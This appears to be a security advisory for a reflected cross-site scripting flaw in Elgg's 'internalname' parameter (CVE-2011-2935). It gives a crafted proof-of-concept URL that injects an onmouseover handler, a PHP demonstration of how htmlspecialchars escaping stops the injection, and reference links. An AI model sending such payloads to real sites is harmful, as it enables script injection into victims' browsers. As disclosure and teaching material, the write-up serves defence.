The internalname parameter is not properly sanitized, which allows an attacker to conduct a cross-site scripting (XSS) attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser:
http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
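
The value in the URL above begins with an encoded double quote, so it only works where the parameter is written unescaped into a double-quoted HTML attribute. The PHP below is an added illustration, not Elgg's code or its actual fix: `render_unsafe`, `render_escaped` and the `<input>` sink are hypothetical. It decodes the query string from that URL and lists the attributes an HTML parser sees in each rendering.

```php
<?php
// Added illustration, not Elgg code. The <input> sink and the function
// names are hypothetical; only the query string comes from the advisory.
$query = 'internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22'
    . 'width:3000px!important;height:3000px!important;z-index:999999;'
    . 'position:absolute!important;left:0;top:0;%22%20x=%22';
parse_str($query, $params);              // URL-decodes, as PHP does for $_GET
$internalname = $params['internalname'];

function render_unsafe(string $value): string
{
    // Raw value inside a double-quoted attribute: a " in the input closes
    // the attribute and the rest is parsed as further attributes.
    return '<input type="text" name="' . $value . '">';
}

function render_escaped(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value stays inside name="...".
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $safe . '">';
}

function attribute_names(string $html): array
{
    // Parse the fragment and return the attribute names on the <input>.
    $previous = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

$renderings = [
    'unsafe'  => render_unsafe($internalname),
    'escaped' => render_escaped($internalname),
];
foreach ($renderings as $label => $html) {
    echo $label, ': ', $html, "\n";
    echo '  attributes: ', implode(', ', attribute_names($html)), "\n";
}
```

Any attribute listed beyond `type` and `name` came from the request parameter, which is the condition the escaped rendering is meant to rule out.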
yehg.net/lab/pr0js/advisories/[elgg_1710]_xss_sqlin
github.com/Elgg/Elgg
github.com/Elgg/Elgg/commit/2843b4f846874d434a2403ac1f27e41035b45e04
github.com/Elgg/Elgg/issues/3544
nvd.nist.gov/vuln/detail/CVE-2011-2935
oss-security.openwall.narkive.com/1UH3NYx8/cve-request-elgg-1-7-10-multiple-vulnerabilities
security-tracker.debian.org/tracker/CVE-2011-2935
web.archive.org/web/20110907122607/blog.elgg.org/pg/blog/brett/read/189/elgg-1711-released